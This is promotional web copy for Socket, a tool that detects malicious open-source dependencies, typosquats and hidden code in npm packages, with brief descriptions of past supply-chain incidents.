Open source code makes up 90% of most codebases. It is critical to manage it effectively to reduce your organization's security risk.
It's 2022 and it's no longer sufficient to scan for known vulnerabilities (CVEs) and stop there. And yet, that's what the leading "supply chain security" products do, leaving you vulnerable.
It can take weeks or months for a CVE to be discovered, reported, and detected by tools. But in today's culture of fast development, a malicious dependency can be updated, merged, and running in production in days or even sometimes hours.
Defenders need a new approach to address emerging threats from malicious dependencies:
Maintainer intentionally added malware – Rogue maintainer sabotaged his own open source package with 100M downloads/month, affecting companies such as Amazon AWS
Package hijacked and poisoned w/ cryptominers and password-stealing malware – Deliberate malware introduced into multiple packages with 30M downloads/month each
Package hijacked to add backdoor targeting a specific organization – Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build
NPM package manager allowed anyone to publish new versions of any package – Attackers could publish new versions of any NPM package without authorization for multiple years
Using third-party dependencies without proper vetting leaves you open to hacking, breaches, and assorted security misfortune.
Security teams depend on Socket to prevent malicious open source dependencies from infiltrating their apps.
Socket dramatically improves your open source security posture by detecting and blocking the attacks you don't expect – malware, hidden code, typo-squatting, and more – which aren't caught by CVE vulnerability scanners.
Block typosquats – Block malicious packages that differ in name by only a few characters, and recommend the correct package
Block malware – Block emerging malware threats
Detect hidden code – Detect obfuscated, minified, or hidden code
Detect privileged API usage – Detect usage of risky APIs – filesystem, network, child_process, environment variables,
Detect suspicious updates – Detect updates that significantly change package behavior
Socket improves security outcomes and reduces work for security teams by surfacing actionable security information directly inline in GitHub so developers are empowered to make better decisions.
Five minute deployment – The easiest security product you'll ever deploy in your organization. Just install a GitHub app and you're done.
Provide security feedback directly on PRs – Empower developers to solve security issues before they're deployed into production.
Automated security – Spend security team resources auditing the highest-impact dependencies, instead of all or nothing.